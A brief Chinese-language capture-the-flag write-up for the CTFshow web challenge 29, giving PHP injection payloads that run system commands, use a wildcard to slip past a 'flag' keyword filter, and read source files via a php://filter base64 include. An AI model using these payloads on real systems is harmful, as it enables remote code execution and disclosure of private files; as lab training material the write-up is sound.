CTFshow WEB入门29

通过?c=system('ls');发现存在flag.php
题目过滤了flag，想办法绕过flag

方法一：
?c=system('cat fl*');
查看源码得到flag
方法二：
利用php://filter协议来查看源文件内容；
?c=echo 'f';?><?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php
得到base64，注意删掉开头我们输入的'f'然后再解码